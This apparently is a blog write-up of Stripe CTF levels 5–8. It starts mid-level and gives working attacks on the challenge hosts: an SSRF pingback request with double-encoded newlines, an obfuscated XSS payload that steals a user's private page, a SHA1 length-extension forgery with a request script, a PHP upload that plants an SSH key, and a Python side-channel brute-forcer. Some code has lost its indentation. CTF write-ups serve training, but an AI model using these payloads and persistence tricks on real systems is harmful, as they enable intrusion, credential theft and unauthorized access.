    def authenticated?(body)
      body =~ /[^w]AUTHENTICATED[^w]*$/
There are multiple ways of clearing this level…but Ryan O’Horo showed me his route, which was the cleanest one out of the four we tried. The whole idea is to get it to match the Authenticated regex, but on a host of level5-*.stripe-ctf.com
So…the easiest route….
POST /user-smrqjnvcis/?username=root&pingback=https://level05-1.stripe-ctf.com/user-smrqjnvcis/%3fpingback=http://level05-2.stripe-ctf.com/AUTHENTICATED%250A HTTP/1.1
The pingback URL contains a newline (%0A) so that the regular expression’s end-of-line marker matches after the word “AUTHENTICATED”, and it must be double-encoded as it’s nested in the original pingback parameter
This will make the application do a pingback on level05 host, but since we included http:// instead of https:// it gave a 302 redirect with the URL https://level05-2.stripe-ctf.com/AUTHENTICATED%250A . Which the application matched to the response containing the regex and authenticated the user.
I’m not going to bother showing the other routes some of us took… simply because I’m embarrassed that we made it so much harder on ourselves instead compared to the 1 request solution used by Ryan.

Level 6:

After Karma Trader from Level 4 was hit with massive karma inflation (purportedly due to someone flooding the market with massive quantities of karma), the site had to close its doors. All hope was not lost, however, since the technology was acquired by a real up-and-comer, Streamer. Streamer is the self-proclaimed most steamlined way of sharing updates with your friends. You can access your Streamer instance here: https://level06-2.stripe-ctf.com/user-bqdgqqeqqd
The Streamer engineers, realizing that security holes had led to the demise of Karma Trader, have greatly beefed up the security of their application. Which is really too bad, because you’ve learned that the holder of the password to access Level 7, level07-password-holder, is the first Streamer user.
As well, level07-password-holder is taking a lot of precautions: his or her computer has no network access besides the Streamer server itself, and his or her password is a complicated mess, including quotes and apostrophes and the like.
Fortunately for you, the Streamer engineers have decided to open-source their application so that other people can run their own Streamer instances. You can obtain the source for Streamer at git clone https://level06-2.stripe-ctf.com/user-bqdgqqeqqd/level06-code. We’ve also included the most important files below.
 
Ok, so in this level we’re dealing with a unique social network. We have to find a way to view the other user’s user_info page to see their password. If you started posting some of your own posts you would find that it is susceptible to Cross-Site Scripting. So we need to find a way to get the user to view their user_info page, and then post the results so that we can view them.
We are limited to not using the single-quote and double-quote characters (‘ and “), but everything else is pretty much legal, so we can take use of JavaScript’s String.fromCharCode() and once again JQuery! We’ll have to break out of their script tags, then inject our code, but we also need to make sure the code doesn’t launch until the entire page has been loaded. They have a csrf token, but it’s poorly implemented, seeing that we can use the current JavaScript code that’s already on the page. Another issue that you will run into is that the results from the user_info page have characters that are not allowed, so we will escape() the data response before posting it. Here’s the payload that I used before String.fromCharCode:
</script><script>$(document).ready(function() {$.get(‘user_info’, function(data) {document.forms[0].body.value = escape(data); document.forms[0].submit();})});</script><script>//
And here it is after….
</script><script>$(document).ready(function() {eval(String.fromCharCode(36,46,103,101,116,40,39,117,115,101,114,95,105,110,102,111,39,44,32,102,117,110,99,116,105,111,110,40,100,97,116,97,41,32,123,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,98,111,100,121,46,118,97,108,117,101,32,61,32,101,115,99,97,112,101,40,100,97,116,97,41,59,32,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,115,117,98,109,105,116,40,41,59,125,41))});</script><script>//
We can now wait and watch posts being created–you can simply keep an eye on /ajax/posts so that your XSS won’t also hit yourself. You’ll soon see a new post by the Level7 user that consists of a huge block of URL-encoded characters. Go ahead and decode them and you’ll see something like…

Level 7:

 
Welcome to the penultimate level, Level 7.
WaffleCopter is a new service delivering locally-sourced organic waffles hot off of vintage waffle irons straight to your location using quad-rotor GPS-enabled helicopters. The service is modeled after TacoCopter, an innovative and highly successful early contender in the airborne food delivery industry. WaffleCopter is currently being tested in private beta in select locations.
Your goal is to order one of the decadent Liège Waffles, offered only to WaffleCopter’s first premium subscribers.
Log in to your account at https://level07-2.stripe-ctf.com/user-dsccixwxvo with username ctf and password password. You will find your API credentials after logging in. You can fetch the code for the level via
git clone https://level07-2.stripe-ctf.com/user-dsccixwxvo/level07-code, or you can read it below. You may find the sample API client in client.py particularly helpful.
This level was a slight twist, you’ll actually be doing an attack on their crypto. Looking at the code you’ll see that they’re using SHA1 hashes that are composed of the raw request that you made plus your secret. We also need to be making a request as a premium user. If you attempted to order a waffle, you’ll receive a confirmation number–in this case if you order the premium waffle, the confirmation number will be your password to Level8.
Here is the block of code that verifies the signature… this is how we know how it is built and that it is sha1
def verify_signature(user_id, sig, raw_params):
    # get secret token for user_id
    try:
        row = g.db.select_one('users', {'id': user_id})
    except db.NotFound:
        raise BadSignature('no such user_id')
    secret = str(row['secret'])

h = hashlib.sha1()
h.update(secret + raw_params)
print computed signature, h.hexdigest(), for body, repr(raw_params)
if h.hexdigest() != sig:
raise BadSignature(signature does not match)
return True

Researching on SHA1 we can see that it has a length-extension attack vulnerability, a type of attack on certain hashes which allow inclusion of extra information. There’s excellent documentation that describes this attack in the Flickr API Signature Forgery Vulnerability write-up. There’s also a nice script and write-up about it at vnsecurity by RD, about how he solved a similar CodeGate 2010 challenge. For my solution I used the script that was supplied on vnsecurity to solve this problem. Since we know what the raw request will be, and we know the length of the secret (14), we can append stuff to the raw request and generate a valid hash. So looking at the /logs/ directory, we can also view other users requests… in this case we’re interested in premium users, so id 1 or 2.
This is a request that was made by user_id 1:
count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo|sig:a75edb45bc6c0057e059b23bc48b84f7081a798f
As you can see, we have the raw request and the final hash… let’s append to this and generate a new valid hash, but ordering  a different waffle.
droogie$ python sha-padding.py ’14’ ‘count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo’ ‘a75edb45bc6c0057e059b23bc48b84f7081a798f’ ‘&waffle=liege’
new msg: ‘count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggox80x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x02(&waffle=liege’
base64: Y291bnQ9MTAmbGF0PTM3LjM1MSZ1c2VyX2lkPTEmbG9uZz0tMTE5LjgyNyZ3YWZmbGU9ZWdnb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIoJndhZmZsZT1saWVnZQ==
new sig: 4c230b26a20f192c4a258f529662d3dd0ad8b62d
And here we are… the script has supplied the correct amount of padding needed and gave us the raw required and a valid hash… let’s go ahead and make the request using a simple python script….
droogie$ cat post.py
import urllib
import urllib2
url = ‘https://level07-2.stripe-ctf.com/user-dsccixwxvo/orders’
data = ‘count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggox80x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x02(&waffle=liege|sig:4c230b26a20f192c4a258f529662d3dd0ad8b62d’
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
print response.read()
droogie$ python post.py
{“confirm_code”: “BdxavaMIKC“, “message”: “Great news: 10 liege waffles will soon be flying your way!”, “success”: true}

Level 8:

Welcome to the final level, Level 8.
HINT 1: No, really, we’re not looking for a timing attack.
HINT 2: Running the server locally is probably a good place to start. Anything interesting in the output?
UPDATE: If you push the reset button for Level 8, you will be moved to a different Level 8 machine, and the value of your Flag will change. If you push the reset button on Level 2, you will be bounced to a new Level 2 machine, but the value of your Flag won’t change.
Because password theft has become such a rampant problem, a security firm has decided to create PasswordDB, a new and secure way of storing and validating passwords. You’ve recently learned that the Flag itself is protected in a PasswordDB instance, accesible athttps://level08-1.stripe-ctf.com/user-eojzgklshq/.
PasswordDB exposes a simple JSON API. You just POST a payload of the form {"password": "password-to-check", "webhooks": ["mysite.com:3000", ...]} to PasswordDB, which will respond with a{"success": true}" or {"success": false}" to you and your specified webhook endpoints.
(For example, try running curl https://level08-1.stripe-ctf.com/user-eojzgklshq/ -d '{"password": "password-to-check", "webhooks": []}'.)
In PasswordDB, the password is never stored in a single location or process, making it the bane of attackers’ respective existences. Instead, the password is “chunked” across multiple processes, called “chunk servers”. These may live on the same machine as the HTTP-accepting “primary server”, or for added security may live on a different machine. PasswordDB comes with built-in security features such as timing attack prevention and protection against using unequitable amounts of CPU time (relative to other PasswordDB instances on the same machine).
As a secure cherry on top, the machine hosting the primary server has very locked down network access. It can only make outbound requests to other stripe-ctf.com servers. As you learned in Level 5, someone forgot to internally firewall off the high ports from the Level 2 server. (It’s almost like someone on the inside is helping you — there’s an sshd running on the Level 2 server as well.)
To maximize adoption, usability is also a goal of PasswordDB. Hence a launcher script, password_db_launcher, has been created for the express purpose of securing the Flag. It validates that your password looks like a valid Flag and automatically spins up 4 chunk servers and a primary server.
You can obtain the code for PasswordDB from git clone https://level08-1.stripe-ctf.com/user-eojzgklshq/level08-code, or simply read the source below.

This level seems to be a little involved, but it’s easy to understand once you see what it is doing. There is a primary server, and when you launch it you supply it a 12 digit password and a socket to listen on. It will break the password up into 4 chunks of 3 characters each and spawn 4 chunk servers. Each chunk server will have a chunk from the primary and all of your requests will be compared to it. The primary server can then receive requests from you with a password. It will chunk up the supplied password and check with the chunk servers; if it receives TRUE on all 4 it will respond with TRUE, but FALSE on any of them and you’ll get a FALSE. Your goal is to figure out what is the 12 digit password that was supplied to the primary server on startup. When making a request to the primary server you can also supply it with a webhook, where it will send the response to whichever socket you supplied.

There’s a major issue here with their design….
If we bruteforce the 12 digit password, we would be looking at this many attempts:
>>> 10**12
1000000000000
If we bruteforce the chunks, we’re looking at a total of this many:
>>> 10**3*4
4000
Or only a maximum of 1000 attempts per chunk. They’ve just significantly lowered their security if there is any possible way we can tell if a chunk was correct or not, which there is of course 😉
Since the network is so locked down, we can’t actually touch the chunk servers themselves… if we could, we would just bruteforce each chunk and this challenge would be very simple… so we have to find another way to bruteforce each chunk. We also can’t try a timing attack because the developers have implemented some delays on responses to avoid this.
Well one thing we can do is get on the local network so that we can get responses from Level8, using Level2 as the description suggested.
Let’s go ahead and create a local ssh key we can use, then upload it to the Level2 server using that file upload vulnerability.
<?php
mkdir(“../../.ssh”);
$h = fopen(“../../.ssh/authorized_keys”, “w+”);
fwrite($h,”ssh-rsa (MYSECRETLOCALSSHKEY)nn”);
fclose($h);
print “DONE!n”;
?>
Cool, now we can ssh into this box:
Linux leveltwo3.ctf-1.stripe-ctf.com 2.6.32-347-ec2 #52-Ubuntu SMP Fri Jul 27 14:38:36 UTC 2012 x86_64 GNU/Linux
Ubuntu 10.04.4 LTS
Welcome to Ubuntu!
 * Documentation:  https://help.ubuntu.com/
Last login: Mon Aug 27 03:45:20 2012 from cpe-174-097-161-152.nc.res.rr.com
groups: cannot find name for group ID 4334
user-wsotctjptv@leveltwo3:~$
At this point we can create sockets and receive responses from the primary server through our webhook parameters. We’ll be able to take advantage of this and use it as a side channel attack to validate if our requests were true or false. We’ll do this by keeping track of the connections to our socket and their srcport. By default, most operating systems are lazy and will use the last srcport + 1 on a connection… so with an invalid request we know that the difference between source ports would be 2… connection to chunk server 1, then back to us with the response. But if our first chunk happened to be successful it would make a request to chunk server 1, then chunk server 2, then us… so if we are able to make an attempt multiple times and see a difference of 3 in the srcports, we know that it was a valid chunk. We can obviously repeat this process and keep track of the differences to verify the first 3 chunks, then we can just bruteforce the last chunk manually. Here’s a python script written by my co-worker Michael which does just that….

#!/usr/bin/env python

import socket
import urllib2
import json
import sys

try:
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(“–port”, default=49567, type=int, help=”Which port to listen for incoming connections on”)
parser.add_argument(“targetURL”, help=”The URL of the targed primary server”)
parser.add_argument(“webhooksHost”, help=”Where the primary server should connect back for the webhooks”)
args = parser.parse_args()
except ImportError:
# level02 server doesn’t have argparse… grrr
class args(object):
port = 49567
targetURL = sys.argv[1]
webhooksHost = sys.argv[2]

def password_gen(length, prefix=””, charset=”1234567890″):
def gen(length, charset):
if length == 0:
yield “”
else:
for ch in charset:
for pw in gen(length – 1, charset):
yield pw + ch

for pw in gen(length – len(prefix), charset):
yield prefix + pw

def do_webhooks_connectback():
c_sock, addr  = webhook_sock.accept()
c_sock.recv(1000)
c_sock.send(“HTTP/1.0 200rnrn”)
c_sock.close()
return addr[1]

def do_auth_request(password):
print “Trying password:”, password
r = urllib2.urlopen(args.targetURL, json.dumps({“password”:password, “webhooks”:webhook_hosts}))
port = do_webhooks_connectback()
result = json.loads(r.read())

print “Connect back Port:”, port

if result[“success”]:
print “Found the password!!!”
print result
sys.exit(0)
else:
return port

def calc_chunk_servers_for_password(password):
# we need to figure out what the “current” port is, so make a request that will fail
base_port = do_auth_request(“aaa”)
# figure out what the last port number is
final_port = do_auth_request(password)
# we should be able to tell how many chunk servers it talked too
return (final_port – base_port) – 1

# create the listen socket
webhook_sock = socket.socket()
webhook_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
webhook_sock.bind((“”, args.port))
webhook_sock.listen(100)

webhook_hosts = [“%s:%d” % (args.webhooksHost, args.port)]

# We can guess our password by calculating how many TCP connections the primary server has
# made before connecting to our webhook. The more connections the server has made,
# the more chunks that we have correct.

prefix = “”
curr_chunk = 1

while True:
for pw in password_gen(12, prefix):
found_chunk = True
for i in xrange(10):
num_servers = calc_chunk_servers_for_password(pw)
print “Num Servers:”, num_servers
if num_servers == curr_chunk:
# incorrect password
found_chunk = False
break
elif num_servers > curr_chunk:
# we may have figured out a chunk… but someone else may have just made a request
# so we will just try again
continue
elif num_servers < 0:
# ran out of ports and we restarted the port range
continue
else:
# somehow we regressed… abort!
print “[!!!!] Hmmm… somehow we ended up talking to fewer servers than before…”
sys.exit(-1)
if found_chunk:
# ok, we are fairly confident that we have found the next password chunk
prefix = pw[:curr_chunk * 3] # assuming 4 chunk servers, with 3 chars each… TODO: should calc this
curr_chunk += 1
print “[!] Found chunk:”, prefix
break